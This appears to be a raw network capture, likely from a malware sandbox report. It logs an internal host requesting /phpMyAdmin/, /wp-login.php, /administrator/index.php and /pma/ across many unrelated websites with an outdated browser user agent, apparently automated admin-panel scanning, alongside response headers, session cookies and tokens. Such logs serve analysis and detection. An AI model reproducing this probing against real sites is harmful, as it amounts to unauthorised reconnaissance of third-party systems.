                                                       reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0"
                                                       report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ,["ServerNonce",[],{"ServerNonce":"AE_1t_KbMyCtakkULGIno-"},141],["KSConfig",[],{"killed":{"__set":["POCKET_MONSTERS_CREATE","POCKET_MONSTERS_DELETE","WORKPLACE_PLATFORM_SECURE_APPS_MAILBOXES","POCKET_MONSTERS_UPDATE_NAME","TPA_SRT_TRANSLATION","WORKROOMS
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1500INData Raw: 67 67 69 6e 67 46 6f 72 4e 6f 6e 43 6f 6d 65 74 22 3a 66 61 6c 73 65 2c 22 64 65 66 65 72 4c 6f 6e 67 54 61 69 6c 4d 61 6e 69 66 65 73 74 22 3a 74 72 75 65 2c 22 6c 61 7a 79 53 6f 54 22 3a 66 61 6c 73 65 2c 22 74 72 61 6e 73 6c 61 74 69 6f 6e 52 65 74 72 69 65 73 22 3a 5b 32 30 30 2c 35 30 30 5d 2c 22 74 72 61 6e 73 6c 61 74 69 6f 6e 52 65 74 72 79 41 62 6f 72 74 4e 75 6d 22 3a 33 2c 22 74 72 61 6e 73 6c 61 74 69 6f 6e 52 65 74 72 79 41 62 6f 72 74 54 69 6d 65 22 3a 35 30 7d 2c 33 32 39 5d 2c 5b 22 43 53 53 4c 6f 61 64 65 72 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 74 69 6d 65 6f 75 74 22 3a 35 30 30 30 2c 22 6d 6f 64 75 6c 65 50 72 65 66 69 78 22 3a 22 42 4c 43 53 53 3a 22 2c 22 66 6f 72 63 65 50 6f 6c 6c 46 6f 72 42 6f 6f 74 6c 6f 61 64 65 72 22 3a 74 72
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ggingForNonComet":false,"deferLongTailManifest":true,"lazySoT":false,"translationRetries":[200,500],"translationRetryAbortNum":3,"translationRetryAbortTime":50},329],["CSSLoaderConfig",[],{"timeout":5000,"modulePrefix":"BLCSS:","forcePollForBootloader":tr
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1500INData Raw: 6e 22 3a 6e 75 6c 6c 2c 22 6d 61 6e 69 66 65 73 74 5f 76 65 72 73 69 6f 6e 5f 70 72 65 66 69 78 22 3a 6e 75 6c 6c 2c 22 62 65 5f 6f 6e 65 5f 61 68 65 61 64 22 3a 66 61 6c 73 65 2c 22 69 73 5f 72 74 6c 22 3a 66 61 6c 73 65 2c 22 69 73 5f 63 6f 6d 65 74 22 3a 66 61 6c 73 65 2c 22 69 73 5f 65 78 70 65 72 69 6d 65 6e 74 61 6c 5f 74 69 65 72 22 3a 66 61 6c 73 65 2c 22 69 73 5f 6a 69 74 5f 77 61 72 6d 65 64 5f 75 70 22 3a 66 61 6c 73 65 2c 22 68 73 69 22 3a 22 37 33 33 32 30 37 35 31 32 32 35 31 33 34 31 36 34 30 32 22 2c 22 73 65 6d 72 5f 68 6f 73 74 5f 62 75 63 6b 65 74 22 3a 22 36 22 2c 22 62 6c 5f 68 61 73 68 5f 76 65 72 73 69 6f 6e 22 3a 32 2c 22 73 6b 69 70 5f 72 64 5f 62 6c 22 3a 74 72 75 65 2c 22 63 6f 6d 65 74 5f 65 6e 76 22 3a 30 2c 22 77 62 6c 6f 6b
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: n":null,"manifest_version_prefix":null,"be_one_ahead":false,"is_rtl":false,"is_comet":false,"is_experimental_tier":false,"is_jit_warmed_up":false,"hsi":"7332075122513416402","semr_host_bucket":"6","bl_hash_version":2,"skip_rd_bl":true,"comet_env":0,"wblok
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1500INData Raw: 22 2c 22 69 73 5f 61 64 73 5f 66 65 61 74 75 72 65 5f 6c 69 6d 69 74 65 64 22 3a 6e 75 6c 6c 2c 22 69 73 5f 62 75 73 69 6e 65 73 73 5f 62 61 6e 68 61 6d 6d 65 72 65 64 22 3a 6e 75 6c 6c 2c 22 65 78 70 69 72 79 5f 74 69 6d 65 22 3a 6e 75 6c 6c 2c 22 68 61 73 5f 76 65 72 69 66 69 65 64 5f 65 6d 61 69 6c 22 3a 6e 75 6c 6c 2c 22 70 65 72 6d 69 74 74 65 64 5f 62 75 73 69 6e 65 73 73 5f 61 63 63 6f 75 6e 74 5f 74 61 73 6b 5f 69 64 73 22 3a 5b 5d 7d 2c 32 36 35 34 5d 2c 5b 22 4a 53 45 72 72 6f 72 4c 6f 67 67 69 6e 67 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 61 70 70 49 64 22 3a 32 35 36 32 38 31 30 34 30 35 35 38 2c 22 65 78 74 72 61 22 3a 5b 5d 2c 22 72 65 70 6f 72 74 49 6e 74 65 72 76 61 6c 22 3a 35 30 2c 22 73 61 6d 70 6c 65 57 65 69 67 68 74 22 3a 6e 75 6c 6c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ","is_ads_feature_limited":null,"is_business_banhammered":null,"expiry_time":null,"has_verified_email":null,"permitted_business_account_task_ids":[]},2654],["JSErrorLoggingConfig",[],{"appId":256281040558,"extra":[],"reportInterval":50,"sampleWeight":null


Session ID: 145
Source IP: 192.168.2.6
Source Port: 63834
Destination IP: 202.81.112.32
Destination Port: 443

Timestamp: 2024-02-05 11:16:10 UTC, Bytes transferred: 195, Direction: OUT, Data:
GET /administrator/index.php HTTP/1.1
Host: testconnect.garena.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Timestamp: 2024-02-05 11:16:10 UTC, Bytes transferred: 187, Direction: IN, Data:
HTTP/1.1 404 NOT FOUND
Date: Mon, 05 Feb 2024 11:16:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 61<h1>Not Found</h1><p>The requested URL /administrator/index.php was not found on this server.</p>0


Session ID: 146
Source IP: 192.168.2.6
Source Port: 64154
Destination IP: 185.120.71.26
Destination Port: 443

Timestamp: 2024-02-05 11:16:10 UTC, Bytes transferred: 189, Direction: OUT, Data:
GET /administrator/index.php HTTP/1.1
Host: www.analvids.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Timestamp: 2024-02-05 11:16:10 UTC, Bytes transferred: 340, Direction: IN, Data:
HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:16:10 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Set-Cookie: PHPSESSID=hdm0iccqh7q72cs0chp5ek02nm; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache


Session ID: 147
Source IP: 192.168.2.6
Source Port: 63406
Destination IP: 44.199.96.179
Destination Port: 443

Timestamp: 2024-02-05 11:16:10 UTC, Bytes transferred: 183, Direction: OUT, Data:
GET /wp-login.php HTTP/1.1
Host: pxndx-mcr.boletia.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Timestamp: 2024-02-05 11:16:10 UTC, Bytes transferred: 197, Direction: IN, Data:
HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:16:10 GMT
Content-Type: text/html
Content-Length: 7358
Connection: close
Server: nginx/1.12.2
Vary: Accept-Encoding
ETag: "5df8f9a3-1cbe"
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC7358INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d e2 80 9c 73 74 79 6c 65 73 68 65 65 74 e2 80 9d 20 68 72 65 66 3d e2 80 9c 68 74 74 70 73 3a 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 6e 6b 77 33 70 6c 72 2e 63 73 73 e2 80 9c 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 2c 20 2a 3a 62 65 66 6f 72 65 2c 20 2a 3a 61 66 74 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Document</title> <link rel=stylesheet href=https://use.typekit.net/nkw3plr.css> <style> *, *:before, *:after { box-sizing: border-box; position: rel


Session ID | Source IP | Source Port | Destination IP | Destination Port
148 | 192.168.2.6 | 63132 | 104.26.14.180 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 186 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: aeaaamorim.inovarmais.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 546 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:16:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KyiIsQxzBcnRC8Vst6JpG0STONeX81g75LLuK4NLsiEzm84o02uxz01Yy8ISASCGM3TXTnA9s2b0v1lqlGVFOlPwGKq2PpgMQd%2FvKT1yaKExnBd24rhv9W3Th2xq8CmXjhezK%2B8yirJ8h2U%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 850abd5c7942b118-ATL
2024-02-05 11:16:10 UTC | 823 | IN
Data Ascii: 4dd<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404
2024-02-05 11:16:10 UTC | 429 | IN
Data Ascii: ound:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2
2024-02-05 11:16:10 UTC | 5 | IN
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
149 | 192.168.2.6 | 63415 | 104.21.60.188 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 166 | OUT | GET /pma/ HTTP/1.1
Host: netizion.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:11 UTC | 964 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:16:11 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Last-Modified: Mon, 05 Feb 2024 11:16:10 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, max-age=0
Link: </styles/fonts/fa/fa-regular-400-min.woff2?_v=5.15.3.1706539464>; rel=preload; as=font; crossorigin=anonymous
Vary: Accept-Encoding
Set-Cookie: xf_csrf=lPLfuRkR2S6NPnB3; path=/; secure
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=So9eBhvQPmnTY%2FvHJyqcucVjEzI4S0UFqSkBnbhS0aaHICCEQAU47qDF4vfeM%2FEdxQfGTn7wiY409EtXauCGPyGOMjxa7ySTchg4ODd3oiSjmxzq2%2B0t20X8tSfbndA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 850abd5c795c6777-ATL
alt-svc: h3=":443"; ma=86400
2024-02-05 11:16:11 UTC | 405 | IN
Data Ascii: 7beb<!DOCTYPE html><html id="XF" lang="en-US" dir="LTR" data-app="public" data-template="error" data-container-key data-content-key data-logged-in="false" data-cookie-prefix="xf_" data-csrf="1707131770,f655f1588d99b6aa58b21d40fee647ce" data-style-id="1
2024-02-05 11:16:11 UTC | 1369 | IN
Data Ascii: tent="width=device-width, initial-scale=1, viewport-fit=cover"><title>Oops! We ran into some problems. | Pinoy Tech Forum</title><link rel="manifest" href="/webmanifest.php"><meta name="theme-color" content="#3f4867" /><meta name="apple-mobile-web-app
2024-02-05 11:16:11 UTC | 1369 | IN
Data Ascii: me_bg_picker.less%2Cpublic%3Axentr_top_section.less%2Cpublic%3Aextra.less&amp;s=17&amp;l=1&amp;d=1706979756&amp;k=bea084bedbd344210db122071a0438b1e62cf0f3" /><style>@font-face{font-family:'Font Awesome 5 Pro';font-style:normal;font-weight:300}.fal{font-
2024-02-05 11:16:11 UTC | 1369 | IN
Data Ascii: o/favicon.png" sizes="32x32" /><link href="https://fonts.googleapis.com/css?family=Open+Sans:wght@300;400;500;600&subset=latin,latin-ext&display=swap" rel="stylesheet" type="text/css"><script async src="https://www.googletagmanager.com/gtag/js?id=G-BSTD
2024-02-05 11:16:11 UTC | 1369 | IN
Data Ascii: -label="Background color picker" aria-expanded="false" aria-haspopup="true"><i aria-hidden="true"></i><span class="p-navgroup-linkText">Background color picker</span></a><div class="menu menu--structural menu--medium" data-menu="menu" aria-hidden="tru
2024-02-05 11:16:11 UTC | 1369 | IN
Data Ascii: new" aria-label="What&#039;s new" title="What&#039;s new"><i aria-hidden="true"></i><span class="p-navgroup-linkText">What's new</span></a><div class="p-search-body" id="xentrSearch"><form action="/search/search" method="post"><div class="p-search"
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC1369INData Raw: 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 5f 78 66 54 6f 6b 65 6e 22 20 76 61 6c 75 65 3d 22 31 37 30 37 31 33 31 37 37 30 2c 66 36 35 35 66 31 35 38 38 64 39 39 62 36 61 61 35 38 62 32 31 64 34 30 66 65 65 36 34 37 63 65 22 20 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 2f 64 69 76 3e 0a 3c 61 20 68 72 65 66 3d 22 2f 6d 69 73 63 2f 73 74 79 6c 65 3f 73 74 79 6c 65 5f 69 64 3d 31 36 26 61 6d 70 3b 74 3d 31 37 30 37 31 33 31 37 37 30 25 32 43 66 36 35 35 66 31 35 38 38 64 39 39 62 36 61 61 35 38 62 32 31 64 34 30 66 65 65 36 34 37 63 65 22 20 63 6c 61 73 73 3d 22 70 2d 6e 61 76 67 72 6f 75 70 2d 6c 69 6e 6b 20 74 68 65 6d 65 2d 73 77 69 74 63 68 65 72 22 20 64 61 74 61 2d 78 66 2d 69 6e 69 74 3d 22 74 6f 6f 6c 74 69 70 22 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <input type="hidden" name="_xfToken" value="1707131770,f655f1588d99b6aa58b21d40fee647ce" /></form></div><a href="/misc/style?style_id=16&amp;t=1707131770%2Cf655f1588d99b6aa58b21d40fee647ce" class="p-navgroup-link theme-switcher" data-xf-init="tooltip"
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC1369INData Raw: 75 2d 73 6d 61 6c 6c 65 72 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 0a 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 6c 61 62 65 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 72 6f 77 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 47 72 6f 75 70 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 47 72 6f 75 70 2d 74 65 78 74 22 20 69 64 3d 22 63 74 72 6c 5f 73 65 61 72 63 68 5f 6d 65 6e 75 5f 62 79 5f 6d 65 6d 62 65 72 22 3e 42 79 3a 3c 2f 73 70 61 6e 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 22 20 6e 61 6d 65 3d 22 63 5b 75 73 65 72 73 5d 22 20 64 61 74 61 2d 78 66 2d 69 6e 69 74 3d 22 61 75 74 6f 2d 63
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: u-smaller" aria-hidden="true"></i></span></span></label></div><div class="menu-row"><div class="inputGroup"><span class="inputGroup-text" id="ctrl_search_menu_by_member">By:</span><input type="text" class="input" name="c[users]" data-xf-init="auto-c
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC1369INData Raw: 64 69 76 20 63 6c 61 73 73 3d 22 74 68 5f 68 6f 6c 69 64 61 79 5f 5f 63 61 74 65 67 6f 72 79 53 74 72 69 70 5f 5f 72 69 67 68 74 22 3e 3c 2f 64 69 76 3e 0a 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 62 75 74 74 6f 6e 2d 2d 70 6c 61 69 6e 20 70 2d 6e 61 76 2d 6d 65 6e 75 54 72 69 67 67 65 72 20 62 75 74 74 6f 6e 22 20 64 61 74 61 2d 78 66 2d 63 6c 69 63 6b 3d 22 6f 66 66 2d 63 61 6e 76 61 73 22 20 64 61 74 61 2d 6d 65 6e 75 3d 22 2e 6a 73 2d 68 65 61 64 65 72 4f 66 66 43 61 6e 76 61 73 4d 65 6e 75 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 4d 65 6e 75 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 62 75 74 74 6f 6e 2d 74 65 78 74 22 3e 0a 3c 69 20 61 72 69 61 2d 68 69 64 64 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: div class="th_holiday__categoryStrip__right"></div><button type="button" class="button--plain p-nav-menuTrigger button" data-xf-click="off-canvas" data-menu=".js-headerOffCanvasMenu" tabindex="0" aria-label="Menu"><span class="button-text"><i aria-hidde
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC1369INData Raw: 3e 53 65 61 72 63 68 20 66 6f 72 75 6d 73 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 2d 6e 61 76 45 6c 20 22 20 64 61 74 61 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 3d 22 74 72 75 65 22 3e 0a 3c 61 20 68 72 65 66 3d 22 2f 77 68 61 74 73 2d 6e 65 77 2f 22 20 63 6c 61 73 73 3d 22 70 2d 6e 61 76 45 6c 2d 6c 69 6e 6b 20 70 2d 6e 61 76 45 6c 2d 6c 69 6e 6b 2d 2d 73 70 6c 69 74 4d 65 6e 75 20 22 20 64 61 74 61 2d 6e 61 76 2d 69 64 3d 22 77 68 61 74 73 4e 65 77 22 3e 57 68 61 74 27 73 20 6e 65 77 3c 2f 61 3e 0a 3c 61 20 64 61 74 61 2d 78 66 2d 6b 65 79 3d 22 33 22 20 64 61 74 61 2d 78 66 2d 63 6c 69 63 6b 3d 22 6d 65 6e 75 22 20 64 61 74 61 2d 6d 65 6e 75 2d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: >Search forums</a></div></div></div></li><li><div class="p-navEl " data-has-children="true"><a href="/whats-new/" class="p-navEl-link p-navEl-link--splitMenu " data-nav-id="whatsNew">What's new</a><a data-xf-key="3" data-xf-click="menu" data-menu-


Session ID | Source IP | Source Port | Destination IP | Destination Port
150 | 192.168.2.6 | 63476 | 31.13.65.1 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 177 | OUT | GET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: web.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 640 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: ps_l=0; expires=Tue, 11-Mar-2025 11:16:10 GMT; Max-Age=34560000; path=/; domain=.facebook.com; secure; httponly; SameSite=Lax
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: ps_n=0; expires=Tue, 11-Mar-2025 11:16:10 GMT; Max-Age=34560000; path=/; domain=.facebook.com; secure; httponly
                                                                                                                                                                                                                                                                                                                                                                Location: https://m.facebook.com/phpMyAdmin/?_rdr
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset="utf-8"
                                                                                                                                                                                                                                                                                                                                                                X-FB-Debug: I3zxow2EyYiT4/8M661Eao8XHJAFZ0qM1l542FKnztidvedUaMHsYTTLOrvL5G13tTDBSpQ2DpZZv6c7GJMx/A==
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
151 | 192.168.2.6 | 63731 | 82.221.28.171 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 166 | OUT | GET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: uh.is
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 256 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.uh.is/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
152 | 192.168.2.6 | 63154 | 172.66.40.88 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 176 | OUT | GET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: warriorplus.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 1366 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                x-powered-by: PHP/7.0.33-6+ubuntu14.04.1+deb.sury.org+3
expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
pragma: no-cache
set-cookie: warriorplus=t7m7koebbgrclahjoueq2ppgn6; expires=Wed, 06-Mar-2024 11:16:10 GMT; Max-Age=2592000; path=/
set-cookie: rqtok=2bcfb037a5cc912bf4b2; expires=Tue, 06-Feb-2024 11:16:10 GMT; Max-Age=86400; path=/
set-cookie: TOKEN=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
set-cookie: TOKEN=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
set-cookie: PASSWORD=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
set-cookie: PASSWORD=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
set-cookie: notifications=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
set-cookie: notifications_aff=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
set-cookie: notifications_sales=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
set-cookie: wpg=gw1s33s7p59ds9s2; expires=Tue, 04-Feb-2025 11:16:10 GMT; Max-Age=31536000; path=/
set-cookie: wpg=gw1s33s7p59ds9s2; expires=Tue, 04-Feb-2025 11:16:10 GMT; Max-Age=31536000; path=/
2024-02-05 11:16:10 UTC  521  IN  Data Ascii:
set-cookie: na_new=1; expires=Tue, 06-Feb-2024 11:16:10 GMT; Max-Age=86400; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5cgOKRD6gThjaBTpjMO6JwMYytrMdWRcJYZH55IyGduY8LHu99%2Bb3bTmcH6hXp9JN
2024-02-05 11:16:10 UTC  1369  IN  Data Ascii: 1ffe<!DOCTYPE html><html lang="en"><head><title>WarriorPlus | WarriorPlus</title><meta property="og:type" content="website"><meta property="og:title" content="WarriorPlus"><meta property="og:site_name" content="WarriorPlus : Your Profit is Our Bu


Session ID  Source IP    Source Port  Destination IP  Destination Port
153         192.168.2.6  63857        45.60.0.44      443

Timestamp  Bytes transferred  Direction  Data
2024-02-05 11:16:10 UTC  414  OUT  GET /phpMyAdmin/ HTTP/1.1
Host: m.codere.com.co
Accept: */*
Accept-Encoding: deflate, gzip
Cookie: incap_ses_1816_2786379=WqiPd+MpAh7vehA+arozGXfDwGUAAAAAf0zscGSg46veBuMVqud6tA==; visid_incap_2786379=5tag4wo4T1GfIO+elp7EN3fDwGUAAAAAQUIPAAAAAAB4BLkAhZmiG4QXdfRN9Zxs; nlbi_2786379=xtV/OHOIMD7ou0OAaJQkpgAAAAAeL0CQftwLs0ZTw13GYZzv
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC  356  IN  HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Strict-Transport-Security: max-age=31536000; includeSubDomains
Date: Mon, 05 Feb 2024 11:16:09 GMT
Connection: close
Content-Length: 1245
X-CDN: Imperva
X-Iinfo: 32-27693990-27694186 NNNY CT(119 138 0) RT(1707131768430 1678) q(0 0 0 -1) r(0 1) U24
